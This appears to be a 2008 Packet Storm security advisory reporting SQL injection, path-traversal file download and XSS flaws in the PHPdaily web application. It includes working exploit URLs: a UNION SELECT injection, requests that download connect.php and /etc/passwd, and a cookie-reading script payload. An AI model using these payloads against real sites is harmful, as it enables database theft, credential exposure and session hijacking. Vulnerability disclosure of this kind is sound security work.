phpdaily-sqlxsslfd.txt

2008-10-27T00:00:00
ID PACKETSTORM:71230
Type packetstorm
Reporter 0xFFFFFF
Modified 2008-10-27T00:00:00

Description

                                        
                                            ` ___________________________________________________________________________________________________________  
| _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ |  
| | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ |  
| | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / |  
| | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / |  
| | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ |  
| | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ |  
| | / \/ |  
| | / _____________________________________________________________________________________________________|  
| | / / .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):. |  
| |/ /______________________________________________________________________________________________________|  
| v / Discoverd By: 0xFFFFFF . Main THX: ALLAH |  
| / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team |  
| / Mail: admin(at)white-hacker[dot]com . |  
|/ Country: Algeria . |  
v___________________________________________________________________________________________________________|  
| Publication info :. |  
|___________________________________________________________________________________________________________|  
| Date: 23-10-2008 . Method : [*] GET [ ] POST |  
| Content: Vulnerability . Register Globals : [ ] ON [*] OFF |  
| Type: SQL-INJ,XSS,LFD . Magic quotes : [*] ON [ ] OFF |  
| Application: PHPdaily . Risk: [*] High [ ] medium [ ] Low |  
| Venedor site: http://phpdaily.self-reliance.be/ . |  
| Version: N/A . |  
| -------------------------------------------------- . |  
| Impact: Exploring Database . |  
| Run unauthorized JavaScript . |  
| Local File Download . |  
| -------------------------------------------------- . |  
| Exploit: Available . |  
| Fix: N/A . |  
|___________________________________________________________________________________________________________|  
| Description :. |  
|___________________________________________________________________________________________________________|  
| |  
| After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of |  
| vulnerabilities. |  
| |  
| Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not |  
| properly verified, a simple user can easily get sensitive information from the database by injecting |  
| SQL Queries. |  
| |  
| Also through "download_file.php" page via the input "fichierwe" any user can download any local file. |  
| Furthermore, through "add_prest_date.php" page there is the ability of XSS. |  
| |  
| ......................................................................................................... |  
| |  
| Requirement |  
| You have to connect as a simple user |  
| |  
| 1. SQL injection Exploit : |  
| [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8# |  
| [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns]) |  
| [Site]prest_detail.php?prev=[SQL-INJ] |  
| [Site]mod_prest_date.php?prev=list&id=[SQL-INJ] |  
| |  
| 2. Local File Download Exploit : |  
| [Site]download_file.php?fichier=../include/connect.php |  
| [Site]download_file.php?fichier=../../../../../../etc/passwd |  
| |  
| 3. XSS Exploit: |  
| [Site]add_prest_date.php?date="><script>alert(document.cookie)</script> |  
|___________________________________________________________________________________________________________|  
| Notice :. |  
|___________________________________________________________________________________________________________|  
| These publications are published for educational purpose thus the author will be not responsible |  
| for any damage. |  
|___________________________________________________________________________________________________________|  
\ © WHITE-HACKER All contents © 2008. All rights reserved. |  
\____________________________________________________________|  
  
  
`